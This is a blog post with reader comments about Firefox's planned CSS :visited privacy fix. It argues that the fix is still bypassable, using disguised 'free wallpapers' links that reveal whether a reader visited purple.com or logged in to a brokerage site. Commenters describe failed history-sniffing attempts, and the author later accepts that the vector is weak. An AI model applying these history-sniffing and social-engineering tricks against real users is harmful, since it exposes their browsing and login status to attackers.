Firefox security case study: Mozilla's CSS :visited solution is still vulnerable

Javascript running on browsers that implement W3C standards today can allow the present page to find pages the user has previously visited. This would be very useful as part of a XSS attack where you needed to know if the user has already authenticated against a login system.

Such as a XSS attack where you can trade stocks on other people’s investment accounts.

Since this information is very useful to an attacker, Mozilla is preparing to break compliance with APIs to stop this vector:

getComputedStyle() et al. will not leak information about page visited status
Differences in styling for visited links versus styling for unvisited links will be restricted against changes in opacity, visibility, and many other ways
These rules propagate and are immune to CSS tricks like combinators and nesting

These are detailed at Mozilla’s privacy CSS blog post

But this issue is too big to settle for a “solution” that breaks the API, does so ungracefully, and still does not solve the problem. Here is a demonstration that will still work if Mozilla goes through with this cowboy (read: Microsoft) attitude to web standards. The first one tells you if you visited purple.com before and the second one tells you if you have logged in to Zecco.com:

Click for free wallpapers here (you didn't visit purple.com before)
Click for free wallpapers here (you visited purple.com before)

Click for free wallpapers here (you didn't visit zecco.com before)
Click for free wallpapers here (you visited zecco.com before)

You could probably do a better job than me of styling these elements, but either way, the attack vector still exists.

▧

Comments

is there any way to exploit this directly ? i tried to post your blog link on Hacker News ( read ) but seems people mostly ignored it. Mr Baron and Mozilla's Team should be informed.
Alberto Armandi

This is totally crazy.
Anonymous

Honestly, after 1 day of coding, hacking and researching i haven't found a viable way to exploit the vulnerability you mention here.
Alberto Armandi

Hello Alberto, thanks for the info and links. I have updated this blog page which contains two active exploits. The second one shows how to apply this to sensitive financial transactions. I will not provide the code, but the javascript alert could be replaced with code that causes the user to send information to a server, or does something nasty based on the fact that it is known the user has logged in to a given website and has the session cookies necessary to make transactions. DISCLAIMER: NOTHING IN THIS POST OR COMMENT DEMONSTRATES A VULNERABILITY, WORKAROUND, OR PLANNED FEATURE UPGRADE OF ZECCO.COM. INSTEAD THIS SHOWS A PROBLEM WITH THE CURRENT W3C WEB STANDARDS AND MOZILLA"S PROPOSED IMPLEMENTATION.
William Entriken

I have just purchased the domain getComputedStyle.com and i intend to publicly release a javascript exploit that is based on the technique you show here to motivate Mr. Baron and the others to switch the API back to the normal behavior. Most of my web apps are breaking because they are based on getComputedStyle, but not for malicious purposes. None of the techniques i have tried until now have worked .What i tried to far is : 1)getting element offsetHeight after it changed color. Not exploitable, returns always the same value for both kind of links. 2)Changing your crafted CSS adding special positioning rules and trying to get the position of the box on the screen by getting its coordinates does not work either. 3) The old-fashioned approach, setting a background url('bg.jpg') works erratically and only if the file pointed is an image and not a php or the likes. 4) I am now trying to hook up to event DOMAttrModified to see if can detected the color change, but i doubt it is going to work because normally it is a script that fires a change in color. In this case it is directly the css trick. I would love to know your thoughts about the matter. Best Regards
Alberto Armandi

Hello Alberto, are you referring to the enso-now site? How are you using the getComputedStyle? All of the tricks you describe are implementation dependent and should not work. If they do work, that is a bug in Mozilla from following their own specification and it will be fixed. The web-designer will be prevented from making good use of getComputedStyle. Their motivation was to make the web safer. What I am demonstrating is that regardless of Mozilla's changes, which only affect legitimate designers like yourself, there will always be a way to use :visited for nefarious purposes.
William Entriken

This doesn't work for me as the "here" on the page is duplicated. You should fix this. I'm on firefox by the way
Anonymous

Yes, there's two Here's. But one has no instruction in front of i, so Boone will click on it.
William Entriken

OK, it's a social engineering attack based on getting people to follow a link based on hiding visited links selectively using color. The exposure here is a tiny tiny fraction of the exposure using getComputedStyle. You can't check 20,000 links in a page this way. This is like trying to break people's passwords by trying to log on to the site, instead of downloading the hashed password file and feeding it to rainbow tables. It's just not a practical attack vector for most of the problem space.
Resuna

@Resuna good analysis, I'm changing my stance on this
William Entriken

I am really not sure whats supposed to happen here. I click the first link, nothing happens (why does even nothing happen?) i press the second one, and i get the alert. But i actually never visited once of the pages before.
Anonymous

Sorry, this is not clearer. Please only click the link next to "Click here for free wallpapers" and ignore the other link. I have fixed the javascript on the first link. Thanks.
William Entriken

thank you! this helped me lots.
ovi

Thank you, this helped me lots!
ovi

Please discuss this topic anywhere and let me know any great comments or media coverage I should link here.